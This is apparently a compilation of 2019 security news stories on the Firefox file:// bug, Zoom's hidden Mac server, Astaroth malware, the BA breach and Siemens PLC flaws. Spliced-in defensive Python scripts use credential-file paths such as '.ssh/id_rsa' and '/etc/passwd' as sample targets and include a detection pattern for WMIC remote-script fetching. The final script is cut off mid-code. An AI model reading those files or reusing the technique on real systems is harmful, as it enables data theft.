STE WILLIAMS

Google suspends Trends emails after revealing murder suspect’s name

After violating a court suppression order and publishing a murder suspect’s name, Google has suspended its Trends alert emails in New Zealand.

In New Zealand, among other countries, the right to a fair trial includes a court’s being able to order people and organizations to refrain from publishing suspects’ names.

Google didn’t refrain. It says it never meant to publish the name, but its Google Trends alerts went ahead and emailed out links to a media report that included it.

A few days after the December 2018 murder of British backpacker Grace Millane, Google had sent an email to anyone signed up for its “what’s trending in New Zealand” alert. After Google’s news-gathering algorithm picked up a British newspaper’s report of the suspect’s court appearance, it automatically forwarded the story to all subscribers, including the name of the accused killer in the subject line.

That action violated a suppression order prohibiting publication of the suspect’s name or identification details. Google’s violation sparked outrage in New Zealand, which, with its low serious-crime rate, had been shocked by the murder of the young tourist, believed to have been killed the night before her 22nd birthday.

According to a furious letter published by NZ Minister of Justice Andrew Little last week, when he met with Google representatives six months ago, Google said that the company took the issue seriously and that they’d look into what they could do to fix the problem.

Six months later, according to Little, Google said that the answer to “what can be done to stop this” amounted to “nothing.”

When I confronted New Zealand Google executives about what happened they indicated they took the issue seriously and would look at what they could do to fix the problem. Six months on, they now tell me they can’t – or won’t – do anything.

Really? A company that big can’t figure out how to fix what Little called “an obvious risk to justice systems”? Sorry, he said, that doesn’t cut it:

I would be failing in my duty if, as a minister of justice in a small country, I threw in the towel and decided nothing could be done in the face of a giant international corporation thinking it could ride roughshod over one of the most important principles of criminal justice.

Little also tweeted out a video clip showing his computer search for the words “don’t be evil,” followed by his text selection of the words “Google’s corporate code of conduct” in a Wikipedia entry.

“Don’t be evil” is, of course, the much-mocked motto that Google dropped back in 2015 when it became Alphabet and decided instead to “Do the Right Thing.”

Little said in his video that, based on the alert, a newspaper had published the prohibited material:

We’ve had a situation where, in a very important trial – the Grace Millane case – a newspaper, helped by Google, has published information that the judge said was suppressed.

Two days after getting scolded by Little, Google sent him a letter saying that the violative email went out to fewer than 200 subscribers.

In the letter, Ross Young, Google’s government affairs and public policy manager, reiterated that the company has a webform in place through which court orders can be submitted, and said that it had taken immediate action to prevent a recurrence of the mistake. Unfortunately, that action didn’t come until four days after the Trends alert was sent.

Little hadn’t been sympathetic to the “nobody told us about the court order” line of defense. It’s up to Google to figure out how to comply, and it shouldn’t be all that hard, given that news outlets manage to do it, he said. From Little’s letter:

One of the issues Google has raised is they don’t know what suppression orders are in force in New Zealand at any time. This doesn’t stop New Zealand based publishers from adhering to the law but I have asked the Ministry of Justice to review how it notifies media about suppression orders as part of its work to implement the new contempt laws.

Young said that Google respects New Zealand law and understands the “sensitivity around this issue”. To ensure that it doesn’t happen again, Google said, it’s suspending Google Trends emails in New Zealand:

In light of the concerns you expressed this week, Google has …suspended Google Trends emails about searches trending in New Zealand. This means that people will no longer receive emails on any trending searches for New Zealand and provides even further assurance against any recurrence.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/m0sLNWJkp-U/

Two pentesters, one glitch: Firefox browser menaced by ancient file-snaffling bug, er, feature

Mozilla has been sitting on a new variant of an age-old flaw for almost a year, even with public disclosure happening back in January.

The issue, disclosed by Dr Vladimir Bostanov of SySS GmbH on 16 January 2019, six months after he’d privately reported it to Mozilla in July 2018, relies on an old implementation of the Same Origin Policy (SOP) for the file URI scheme.

Getting the browser to read local files is nothing particularly new – those born around the time of the first report are probably thinking about learning to drive around now.

To be fair, as Mozilla’s security lead Daniel Veditz told us: “That’s how all browsers worked back then. Firefox was the first to move to stricter handling in 2008 with Firefox 3, but even that was not as strict as we wanted it to be due to compatibility issues.”

A more recent report, which came in seven years ago, highlighted the issue once again.

Back then, the worry was that this was a valid use case for Firefox and that fixing it would break some existing applications (for example, HTML documentation).

Significantly, however, it was also observed that Google had done things a little differently with Chrome and applied a more restrictive security policy to file://, with every file treated as a different origin. Firefox, of course, allowed files to access elements in the same directory.

Chrome has long since eclipsed Firefox both in usage and significance so the “but it will break things” excuse for not tightening stuff up is a tad redundant.

As Veditz observed: “Chrome leapfrogged into even stricter behavior and we are now following suit.”

It’s a direct(ory) hit

Bostanov’s report shows a new twist on the implementation. It was thought that hackers needed to know the name of a file in order to steal it, but a bug in Mozilla’s implementation means that malicious code can grab an entire directory listing. The contents of the files in the list can then be slurped and dumped on an attacker’s server.
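To make the policy difference concrete, here is an added example of my own (not code from Mozilla, Google, or Bostanov’s proof of concept): a small model of the two file:// origin rules, applied to a constructed Downloads folder. The per-directory rule follows the article’s description of pre-fix Firefox, extended to subdirectories as I understand that rule; the per-file rule models Chrome’s “every file is its own origin”. The paths and file names are invented.

```python
"""Added example (not from Mozilla, Chrome or the article): a model of the two
file:// same-origin rules the article contrasts, applied to a constructed
Downloads folder."""
import posixpath
from urllib.parse import unquote, urlparse


def file_path(uri):
    """Normalised path of a file:// URI; '..' segments are collapsed so a
    traversal in the target cannot widen what the policy allows."""
    parsed = urlparse(uri)
    if parsed.scheme != "file":
        raise ValueError(f"not a file URI: {uri}")
    return posixpath.normpath(unquote(parsed.path))


def can_read(policy, reader_uri, target_uri):
    """Can a document loaded from reader_uri read target_uri?

    "per_directory": the pre-fix Firefox rule as the article describes it
        (and, as I understand it, subdirectories too): the directory itself,
        i.e. its listing, and everything at or below it.
    "per_file": the Chrome rule, every file its own origin; modelled
        generously as "only the file itself".
    """
    reader, target = file_path(reader_uri), file_path(target_uri)
    if policy == "per_file":
        return reader == target
    if policy == "per_directory":
        base = posixpath.dirname(reader)
        return target == base or target.startswith(base.rstrip("/") + "/")
    raise ValueError(f"unknown policy: {policy}")


def reachable(policy, reader_uri, candidates):
    """Subset of candidates a malicious page at reader_uri could slurp."""
    return [c for c in candidates if can_read(policy, reader_uri, c)]


# Constructed layout: the downloaded lure sits in ~/Downloads next to real files.
LURE = "file:///home/alice/Downloads/free_ipad.html"
CANDIDATES = [
    "file:///home/alice/Downloads/",                     # the listing itself
    "file:///home/alice/Downloads/tax_return_2018.pdf",
    "file:///home/alice/Downloads/scans/passport.jpg",   # subdirectory
    "file:///home/alice/Downloads/../.ssh/id_rsa",       # traversal attempt
    "file:///etc/passwd",
]

if __name__ == "__main__":
    for policy in ("per_directory", "per_file"):
        print(policy, reachable(policy, LURE, CANDIDATES))
```

The interesting line is the first candidate: under the per-directory rule the directory itself is in scope, which is exactly the listing the article says Bostanov’s page enumerates before reading each sibling. The traversal case shows the damage is bounded by the directory, not by anything the attacker writes in the URL.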

Admittedly, a bit of social engineering is required.

Bostanov suggests a scenario where a user is persuaded to download a malicious HTML file through the usual tricks (“Click here for your free iPad!”) and then opens the file using file manager or similar. Firefox opens the file, and shows a directory listing and a message saying something along the lines of the file is being “protected” and must be opened in “safe mode”. The user clicks the link to the file to do so, and hey presto – some naughty JavaScript swoops in and slurps every file in the same directory.

Another researcher, Barak Tawily, posted a similar exploit to Mozilla’s Bugzilla tracker two weeks ago. Tawily used clickjacking to further conceal the full horror from the user, but the underlying issue is the same. Tawily’s approach was highlighted last week in The Hacker News.

To demonstrate the issue, Bostanov’s team created a proof of concept. We’d advise caution in using it – at the very least, create some dummy files in a folder you can easily blow away.

Seeing those files turn up on someone else’s server after a few innocuous mouse-clicks is sobering for sure. We used Firefox 67.0.4 in Windows 10 and can confirm the exploit works as advertised.

While Bostanov had praise for Tawily (describing him to The Register as “a solid pentester”), Mozilla came in for some flak from the researcher. After all, that directory listing bug had been raised last year.


Bostanov told us that he struggled to get a response from bugzilla.mozilla.org, saying: “They almost never talked to me – they talked among themselves without reacting to my posts.” He described the discussion as “interesting and productive”, but added: “I could not participate – whatever I wrote elicited no response.”

And so the bug lingered on, with Tawily the latest to flag it up.

Bostanov’s team are all Firefox users, and he had some kind words for the foundation. “I admire Mozilla. I think what they do is great… So, as users, we are very interested in its improvement.”

It’s been a tough few months for the veteran browser as its efforts to stem the seemingly unstoppable rise of Chromium have foundered with an expired extensions certificate annoying users in May followed by a zero-day exploit in June. Mozilla is also pondering a “premium” service as a way of bolstering its revenues.

There is good news, however: the browser maker told us: “We are currently updating the security model to ensure that files sent to users cannot expose their local files. The patch will be shipped within the next few days.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/mozilla_firefox_local_files_bug/

Anyone for unintended Chat Roulette? Zoom installs hidden Mac web server to allow auto-join video conferencing

Zoom Video Communications, whose web conferencing service is used by millions, is under fire for installing a hidden web server on Macs in order to bypass user consent when joining a meeting.

Researcher Jonathan Leitschuh, a member of the security team at Gradle Inc, investigated how the Zoom client opens automatically when you receive a meeting link.

Leitschuh discovered that when you install Zoom on a Mac, it installs a web server on port 19421. If you then click on a Zoom conferencing link, the page loads an image from the web server on localhost, where the size of the image returned represents a status code – a hack to get around CORS (Cross-Origin Resource Sharing) restrictions which apply to Ajax requests.

The result is that you can get a user to join a Zoom call simply by embedding a Zoom link into a website, for example, by using an iframe (inline frame). The user sees an ordinary web page URL but the iframe loads the Zoom link automatically.

The default Zoom configuration leaves it to the host to determine whether or not the camera is automatically enabled. Therefore, an attacker can view the user’s webcam simply by persuading them to visit the attacker’s site.

As Leitschuh observes, the consequences could be more serious if there are other exploitable vulnerabilities in the Zoom client – such as the “Zoom Unauthorized Command Execution” bug – which Tenable reported in November 2018 but is now fixed.

Just to save a click?

Leitschuh reported the problem to Zoom, along with a related denial-of-service vulnerability. He was offered a financial bounty, which he declined, because it was conditional on never publicly disclosing the bugs.

Zoom responded by changing the host’s ability to choose whether the camera is enabled – but the fix later regressed, and Leitschuh also found that the iframe trick described above bypassed it.

There are further concerns. One is that even if you uninstall Zoom on the Mac, it leaves the Zoom web server in place. The web server has the ability to reinstall the Zoom client, rendering the uninstall attempt ineffective. This ability is also a security incident waiting to happen, since if an attacker managed to gain control of one of the allowed domains for downloading the client, it could install some other executable.

“To shut down the web server, run lsof -i :19421 to get the PID of the process, then do kill -9 [process number]. Then you can delete the ~/.zoomus directory to remove the web server application files,” Leitschuh explained.
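As an added example of my own (not Zoom’s code and not Leitschuh’s), here is a script that finds the leftover localhost server from `lsof` output and, only when explicitly asked, applies the removal steps quoted above. The `lsof` column layout and the `~/.zoomus` path are the only assumptions; the sample output used in testing is constructed.

```python
"""Added example (mine, not Zoom's or Leitschuh's): locate the leftover Zoom
localhost server from `lsof` output and, only when asked, apply the removal
steps quoted above. Run with --force to actually kill and delete."""
import os
import re
import shutil
import signal
import subprocess
import sys
from pathlib import Path

ZOOM_PORT = 19421
ZOOM_DIR = Path.home() / ".zoomus"


def listening_pids(lsof_output, port=ZOOM_PORT):
    """Parse `lsof -nP -iTCP:<port> -sTCP:LISTEN` text into sorted (pid, command) pairs.
    Columns: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME [STATE]."""
    found = {}
    for line in lsof_output.splitlines():
        parts = line.split()
        if len(parts) < 9 or not parts[1].isdigit():
            continue  # header or malformed line
        name = parts[8]  # e.g. 127.0.0.1:19421 or *:19421
        if re.search(rf":{port}$", name) and "(LISTEN)" in line:
            found[int(parts[1])] = parts[0]
    return sorted(found.items())


def run_lsof(port=ZOOM_PORT):
    """Live query; returns '' when lsof is not installed."""
    try:
        return subprocess.run(["lsof", "-nP", f"-iTCP:{port}", "-sTCP:LISTEN"],
                              capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        return ""


def remediate(lsof_output, zoom_dir=ZOOM_DIR, dry_run=True):
    """Return the actions taken (or, in dry_run mode, the ones that would be)."""
    zoom_dir = Path(zoom_dir)
    actions = []
    for pid, cmd in listening_pids(lsof_output):
        actions.append(f"kill -9 {pid} ({cmd})")
        if not dry_run:
            os.kill(pid, signal.SIGKILL)
    if zoom_dir.is_dir():
        actions.append(f"rm -r {zoom_dir}")
        if not dry_run:
            shutil.rmtree(zoom_dir)
    return actions


if __name__ == "__main__":
    for action in remediate(run_lsof(), dry_run="--force" not in sys.argv) or ["nothing found"]:
        print(action)
```

Running it without `--force` is a safe check to repeat after an uninstall: if it still reports a listener on 19421 or a `~/.zoomus` directory, the uninstall left the server behind, which is the behaviour the article describes.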

Zoom has made two statements about the matter. In a blog post, Richard Farley, Zoom’s chief information security officer, said that Zoom users can set a preference for video on or off when joining a meeting. “The host or any other participant cannot override a user’s video and audio settings to, for example, turn their camera on.”

This is not inconsistent with what Leitschuh claims. The host does determine whether or not the participant’s camera is on, but this is subject to the user’s preferences. As ever, the majority of users accept the defaults, so if the default is ON then video will be on. A clean install of Zoom does default to video on; the preference is phrased in the negative, so you have to check “Turn off my video when joining meeting” to avoid it.

This setting, which defaults to ON, controls whether a Zoom meeting has video automatically enabled

Further, Farley justifies installing the web server even though this is specifically to bypass a security feature introduced by Apple in Safari 12, writing:

When Zoom is installed on a Mac device by the user, a limited-functionality web server that can only respond to requests from the local machine is also installed on the device. This is a workaround to a change introduced in Safari 12 that requires a user to confirm that they want to start the Zoom client prior to joining every meeting. The local web server enables users to avoid this extra click before joining every meeting. We feel that this is a legitimate solution to a poor user experience problem, enabling our users to have faster, one-click-to-join meetings. We are not alone among video conferencing providers in implementing this solution.

The company also issued a public statement (PDF) with a similar claim that installing a local web server is a reasonable workaround “to avoid this extra click before joining a meeting”. The statement adds that a July update will add a feature to “apply and save the user’s video preference from their first Zoom meeting to all future Zoom meetings”.

This does not sound like a full solution.

What about Windows users? No hidden web server perhaps; but that is because on Windows the “extra click” is not needed. The meeting opens automatically, with video (tested in Firefox, Chrome and Edge), provided the browser has set the association with .zoommtg links – a once-only operation. Depending on preferences, you might also get a conference options prompt in front of the meeting, but you have already joined. Whether browsers should allow this without a further prompt is a moot point, and one which Apple attempted to fix in Safari.

If you do not like this behaviour, remove the association with .zoommtg in your browser. For example, here is the setting in Firefox:

The setting in Firefox to prevent Zoom auto-starting


The Mac web server running on localhost is an extra security risk, though, especially as it has an unpublished API. An attacker could have an IMG tag on a page, for example, set to a src=URL on your Zoom web server. It is hard to understand how Zoom’s security officer can justify risks like these in the name of avoiding “poor user experience”. On the other hand, this does demonstrate the lengths to which a company will go to achieve a slight advantage in ease of use, never mind the consequences.

Security-conscious Mac users may want to remove all traces of Zoom at least until the risks are better understood. Tape over the camera? Maybe. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/zooms_hidden_mac_web_server_allows_autojoin_conferencing_exploit/

Dear El Reg, Will Windows 10 break my VPN? I read it on the web so it must be true

Microsoft’s latest official Windows 10 update, OS Build 18362.207, from June 27, 2019, can potentially break your VPN. But it probably won’t because it’s an edge case that can be expected to affect very few people.

We saw some signal flares raising the alarm and, upon looking into the issue, it’s clear there’s less than meets the eye to this piece of information. You can carry on until an actual emergency arrives.


What’s this? I need my VPN. What’s going on?

Recently, Microsoft published an update detailing incremental improvements to its May Windows 10 (version 1903) and Windows Server (version 1903) releases. The note about the optional update includes an ominous warning:

“The Remote Access Connection Manager (RASMAN) service may stop working and you may receive the error ‘0xc0000005’ on devices where the diagnostic data level is manually configured to the non-default setting of 0.”


What’s the Remote Access Connection Manager?

As its name suggests, it manages dial-up and virtual private network connections between a Windows computer and a remote network, like the internet or a corporate network. So if RASMAN stops working, you may find yourself in airplane mode and stuck with reading local files.


Er, I don’t use dial-up.

We don’t know anyone who does either, although in remote areas of the US that network providers haven’t reached it is still used. While we have fond memories of screeching modems negotiating to establish a 300 baud connection, now most of us just have the silence of the LANs.



But I do use a VPN. Should I worry?

Probably not. Per Microsoft’s note, “This issue only occurs when a VPN profile is configured as an Always On VPN (AOVPN) connection with or without device tunnel. This does not affect manual only VPN profiles or connections.”

AOVPN arrived alongside Windows Server 2016 and is an enterprise deployment; if you aren’t using it, this isn’t for you. And unless someone has manually set the device’s diagnostic data (telemetry) level to 0, which is not the default, there’s no issue.


OMG, I am using AOVPN and the diagnostic data level has been set to 0! Can I curse Microsoft now?

Don’t let us stop you from exercising your lungs or typing fingers on behalf of a worthy cause. But at least in this instance, as Microsoft notes above, if the issue involves AOVPN, your administrator can switch to a manual connection as a workaround. And seeing as you’re working in an enterprise environment where it can be months or years before updates get deployed, you probably aren’t using the affected version of Windows 10 yet.

And by the time you are, the bug is likely to be fixed – Microsoft says, “We are working on a resolution and estimate a solution will be available in late July.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/08/windows_10_vpn_bug/

Meet the Great Duke of… DLL: Microsoft shines light on Astaroth, a devilishly sneaky strain of fileless malware

Microsoft has lifted the lid on the inner-workings of a particularly nasty piece of fileless malware that aims to pilfer user data without needing to install software on the victim’s machine.

Dubbed Astaroth – the same name as the Great Duke of Hell – the software nasty has been in circulation since 2017 and has primarily been used to steal data from companies in South America and Europe via targeted attacks launched through spear-phishing.

What makes the infection unusual, says Microsoft Defender ATP Research Team member Andrea Lelli, is its ability to fly under the radar of traditional antivirus products by operating without ever needing to install an executable on the victim’s machine.

“Astaroth is a notorious info-stealing malware known for stealing sensitive information like credentials, keystrokes, and other data, which it exfiltrates and sends to a remote attacker,” Lelli explained today.

“The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.”

Typically, the attack begins when a victim opens a link inside a spear-phishing email. That link delivers a shortcut file which runs a command line that downloads and runs JavaScript code. The JavaScript then pulls and runs two DLL files that perform the dirty work of logging and uploading the victim’s information while disguising themselves as a system process.

This procedure is highly effective against traditional signature-based detection tools because, throughout the process, nothing other than the DLL files is actually downloaded or installed; every stage before that runs inside legitimate system binaries. Thus there is little opportunity to scan or catch the attack.

It is also an approach that has let Astaroth thrive since late 2017 without having to rely on vulnerability exploits or traditional trojan downloaders.

“For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded—after all, every executable used in the attack is non-malicious,” said Lelli.

“If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.”

To catch the malware, Lelli says, Microsoft and other vendors have had to rely on their heuristic detection tools. In particular, AV tools need to be closely monitoring the use of WMIC command-line code and applying rules when loading DLL files – such as checking the age of a file and flagging or blocking newly-created DLLs from running. When you know what you are looking for, Lelli explains, fileless malware isn’t particularly hard for newer security tools to catch.
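As an added example of my own (not Microsoft’s detection logic), here are the two heuristics Lelli describes, run over constructed process-creation and image-load events: flag a WMIC command line that fetches a stylesheet from a remote URL, and flag a DLL that was written to a user-writable path only minutes before being loaded. The `/format:<URL>` pattern comes from Microsoft’s Astaroth write-up rather than from the article; the event shape, the path list and the ten-minute threshold are my assumptions.

```python
"""Added example (mine, not Microsoft's detection logic): the two heuristics
Lelli describes, run over constructed process-creation and image-load events.
The /format:<URL> pattern is the WMIC trick from Microsoft's Astaroth write-up;
the event shape, path list and 10-minute threshold are my assumptions."""
from datetime import datetime, timedelta
import re

REMOTE_XSL = re.compile(r"""/format\s*:\s*["']?(https?://[^\s"']+)""", re.I)
USER_WRITABLE = ("/users/", "/temp/", "/appdata/", "/programdata/")  # assumed list


def wmic_remote_xsl(cmdline):
    """Return the remote stylesheet URL if wmic.exe is told to fetch one, else None."""
    if "wmic" not in cmdline.lower():
        return None
    match = REMOTE_XSL.search(cmdline)
    return match.group(1) if match else None


def fresh_dll_from_user_path(image, created, loaded, max_age=timedelta(minutes=10)):
    """True if a DLL in a user-writable path was created shortly before being loaded."""
    path = image.replace("\\", "/").lower()
    if not path.endswith(".dll") or not any(p in path for p in USER_WRITABLE):
        return False
    return timedelta(0) <= loaded - created <= max_age


def triage(events):
    """Return one finding string per suspicious event, in input order."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            url = wmic_remote_xsl(ev["cmdline"])
            if url:
                findings.append(f"wmic remote XSL from {url} (pid {ev['pid']})")
        elif ev["type"] == "image_load":
            created = datetime.fromisoformat(ev["created"])
            loaded = datetime.fromisoformat(ev["time"])
            if fresh_dll_from_user_path(ev["image"], created, loaded):
                age = int((loaded - created).total_seconds())
                findings.append(f"{ev['process']} loaded {age}s-old DLL {ev['image']}")
    return findings


# Constructed telemetry, not real logs.
EVENTS = [
    {"type": "process", "pid": 3012,
     "cmdline": 'wmic.exe os get /format:"http://cdn.example.invalid/v.xsl"'},
    {"type": "process", "pid": 3015, "cmdline": "wmic.exe os get caption"},
    {"type": "image_load", "process": "regsvr32.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\r1.dll",
     "created": "2019-07-08T10:14:02", "time": "2019-07-08T10:15:30"},
    {"type": "image_load", "process": "explorer.exe",
     "image": r"C:\Windows\System32\shell32.dll",
     "created": "2019-03-19T04:37:41", "time": "2019-07-08T10:15:31"},
]

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print("ALERT:", finding)
```

Neither rule looks at the DLL’s bytes, which is the point Lelli makes: the obfuscated payload changes between campaigns, but a system utility pulling script from the internet and a minutes-old library appearing in a temp directory are behaviours, and behaviours are what you key on.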

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software,” the Redmond security bod writes.

“On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/08/microsoft_astaroth_examination/

NIST Sets Draft Guidelines for Government AI

This is the first formal step in writing the standards that will guide the implementation of AI technologies within the federal government.

The National Institute of Standards and Technology (NIST) has issued a draft guideline for developing artificial intelligence (AI) technical standards, the first major, formal step in writing the standards that will guide the procurement and implementation of AI and machine learning technologies within the federal government. And because many private organizations base their decisions on NIST documents, those standards could have repercussions that reach far beyond government purchasing.

Within the draft guideline are sections that deal with a wide variety of topics around AI, including how AI applications are developed, how AI is explained to stakeholders and the public, and how AI applications are used. Security plays a role in several aspects of the proposal, from how to build “trustworthy” AI applications to ensuring that AI’s use takes both proper security and proper concern for privacy into account.

The NIST Guideline has been developed as part of the response to the American AI Initiative, established by executive order in February. Within five key areas of emphasis set out in the order, one called for NIST “to lead the development of appropriate technical standards for reliable, robust, trustworthy, secure, portable, and interoperable AI systems.” Formal comments on the draft are being accepted through July 19.


Article source: https://www.darkreading.com/application-security/nist-sets-draft-guidelines-for-government-ai/d/d-id/1335165?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Britain Looks to Levy Record GDPR Fine Against British Airways

The penalty is a sign of things to come, say experts.

British Airways is facing a £183 million (US$229 million) fine for a June 2018 data breach — the largest fine to date under the European Union’s General Data Protection Regulation (GDPR).

According to a statement issued today, the Information Commissioner’s Office (ICO) of the United Kingdom said it notified British Airways of its intent to levy the penalty for the company’s security failings, which led to a half-million customers’ information being harvested by a fraudulent site. The information commissioner for the UK warned that other companies could face similar penalties unless they better protect UK citizens’ information.

“When an organization fails to protect [people’s personal data] from loss, damage, or theft, it is more than an inconvenience,” said Elizabeth Denham, the UK information commissioner, in a statement. “That’s why the law is clear — when you are entrusted with personal data, you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”

GDPR went into effect in May 2018, the same year both Equifax and Facebook were fined £500,000 by the UK for their violations of citizens’ privacy due to the 2017 Equifax data breach and early 2018 Cambridge Analytica scandal.

Had GDPR applied, those fines could have been much higher. The proposed penalty against British Airways is roughly 1.4% of the £13.0 billion (US$16.3 billion) revenue the company reported for 2018; the ICO pegged it at 1.5% of worldwide turnover for 2017. EU data protection authorities can fine companies up to 4% of their annual revenues for the previous financial year, depending on the severity of the infringement.

“They have been fined 1.5 percent of their worldwide turnover in 2017, which is near the 2 percent maximum fine,” said Guy Bunker, chief technology officer at cybersecurity company Clearswift, in a statement. “The good news is that the breach was picked up relatively quickly. BA has systems in place such that it could narrow down both how the incident happened and who was affected.”

British Airways publicly announced the breach on September 6, 2018, stating that attackers were able to harvest data from its site during the payment process. The company claimed at the time that the breach only affected customers between August 15, 2018, and September 5, 2018. 

The fact that the attackers stole information directly from the payment forms suggests the attack was linked to the Magecart group, which is also blamed for a breach earlier in 2018 of Ticketmaster’s site, according to a September analysis of the attack by security firm RiskIQ.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer, which grabbed forms indiscriminately,” said Yonathan Klijnsma, RiskIQ head researcher and report author, in the analysis. “This particular skimmer is very much attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

Companies need to be on guard against such attacks. Unfortunately, less than 60% of all companies are currently meeting all, or most, of the GDPR’s requirements, according to Cisco’s 2019 “Data Privacy Benchmark Study.” Almost 90% of companies expect to be meeting the requirements within the next year, the report points out.

Cisco did find that companies that are GDPR-compliant have fewer data breaches, are able to respond to data breaches faster, and are ultimately less impacted by the breaches that do happen.

“If a business the size of BA can be found wanting, smaller companies should be asking themselves whether their data security arrangements are up to scratch,” said Susan Hall, an IT and data protection specialist lawyer and partner at Clarke Willmott, in a statement. “This reinforces the importance for businesses of having robust terms and conditions with anyone to whom they contract website development and hosting, and of carrying out penetration testing and constant security monitoring of all interfaces through which attacks can be launched.”

The ICO notice is not a final determination. The agency will allow British Airways and other groups to comment before committing to the fine, ICO Commissioner Denham said. 

“Under the GDPR ‘one-stop-shop,’ provisions, the data protection authorities in the EU whose residents have been affected will also have the chance to comment on the ICO’s findings,” she said. “The ICO will consider carefully the representations made by the company and the other concerned data protection authorities before it takes its final decision.”


Article source: https://www.darkreading.com/britain-looks-to-levy-record-gdpr-fine-against-british-airways/d/d-id/1335166?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers Poke Holes in Siemens Simatic S7 PLCs

Black Hat USA session will reveal how they reverse-engineered the proprietary cryptographic protocol to attack the popular programmable logic controller.

A group of security researchers in Israel has discovered vulnerabilities in the Siemens S7 Simatic architecture that ultimately allowed them to build a phony engineering workstation that was able to dupe — and alter — operations of the S7 programmable logic controller (PLC) that runs industrial processes.

Eli Biham and Sara Bitan of Technion, and Avishai Wool and Uriel Malin of Tel Aviv University, will reveal at Black Hat USA next month in Las Vegas the security weaknesses they found in the newest generation of the Siemens systems and how they reverse-engineered the proprietary cryptographic protocol in the S7.

Their rogue engineering workstation poses as the so-called TIA engineering station that operates with the Simatic S7-1500 PLC, which in turn interfaces with and runs the industrial system or process. It can remotely start and stop the PLC via the newly found flaws in the Siemens communications architecture, potentially wreaking havoc on an industrial system or process, according to the researchers. They were able to wrest those controls from the PLC by surreptitiously downloading rogue command logic to the S7 PLC.

They hide the rogue code so that a process engineer could not see it: If the engineer were to check the code, he or she would only see the legitimate PLC source code, unaware of the malicious code running in the background and issuing rogue commands to the PLC.

“You could have some disruption in the physical process,” explains Wool, a professor at Tel Aviv University’s School of Electrical Engineering.

The research — details of which the researchers won’t disclose until their talk at Black Hat — combined deep-dive studies of the Siemens technology by teams at both Technion and Tel Aviv University. Their findings demonstrate how a sophisticated attacker could abuse Siemens’ newest generation of industrial controllers that were built with more security features and more secure communication protocols.

Siemens doubled down on industrial control system (ICS) security after the infamous Stuxnet attack, in which its older controllers were targeted in a sophisticated operation that ultimately sabotaged centrifuges at Iran’s Natanz nuclear facility. Siemens was then one of the first ICS/SCADA vendors to build a secure software development program and to roll out new products with built-in security features such as firewalls and VPNs.

The industrial systems vendor now also offers managed security services, including monitoring, incident response, and management, to the industrial sector.

Siemens confirmed that it has been working with the researchers, who have shared the details of their findings with the vendor. “Siemens is aware of the findings, has been working with the researcher, and will provide further information as it becomes available via Siemens ProductCERT,” a Siemens spokesperson said.

For now, the researchers recommend layered defenses against such attacks on the PLCs: firewalls, access controls, and removing any Internet connectivity from the S7s. In practice that means restricting TCP/102 (the ISO-TSAP port that carries S7 communications) on the PLC’s network segment to the approved engineering station, since a rogue workstation must be able to reach that port to talk to the controller at all.
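The impersonation described above rides the same TCP/102 session that a legitimate TIA Portal station uses, so the layered defenses the researchers recommend come down to controlling, and watching, who reaches that port on the PLC segment. The following script is an added example, not code from the researchers or from Siemens: it audits constructed, simplified Zeek-style connection records for S7 sessions from hosts other than the approved engineering station, from outside the plant network, or outside a change window, and flags large client-to-PLC transfers that would be consistent with a program download. The addresses, the allowlist, the change window and the byte threshold are all assumptions made for the example.

```python
import ipaddress
from collections import namedtuple
from datetime import datetime, timezone

# --- assumed inventory and policy (hypothetical values for this example) ---
PLCS = {"10.0.20.11", "10.0.20.12"}             # Simatic S7-1500 controllers
ENGINEERING_STATIONS = {"10.0.10.5"}            # the only TIA Portal host allowed to program them
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
S7_PORT = 102                                   # ISO-TSAP: S7comm and S7comm-plus both use TCP/102
CHANGE_WINDOW_UTC = (8, 17)                     # hours (UTC) during which programming is expected
LARGE_TRANSFER_BYTES = 10_000                   # heuristic: client->PLC volume typical of a program download

# Constructed sample, simplified Zeek-style conn.log (tab-separated):
# ts, orig_h, orig_p, resp_h, resp_p, proto, orig_bytes. Not real traffic.
SAMPLE_CONN_LOG = """\
1562551200.000\t10.0.10.5\t50190\t10.0.20.12\t102\ttcp\t3500
1562587200.101\t10.0.10.5\t50210\t10.0.20.11\t102\ttcp\t4120
1562587260.377\t10.0.10.5\t50211\t10.0.20.12\t102\ttcp\t3980
1562590800.004\t10.0.30.77\t41200\t10.0.20.11\t102\ttcp\t18440
1562590860.512\t10.0.30.77\t41201\t10.0.20.11\t102\ttcp\t220
1562591000.000\t10.0.10.5\t50300\t10.0.20.11\t443\ttcp\t900
1562594400.250\t203.0.113.9\t6100\t10.0.20.12\t102\ttcp\t16720
"""

Finding = namedtuple("Finding", "ts src plc reason large_transfer")


def parse_conn_log(text):
    """Parse the simplified conn.log format above into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, _sport, dst, dport, proto, obytes = line.split("\t")
        records.append({"ts": float(ts), "src": src, "dst": dst,
                        "dport": int(dport), "proto": proto, "orig_bytes": int(obytes)})
    return records


def _is_internal(ip):
    addr = ipaddress.ip_address(ip)
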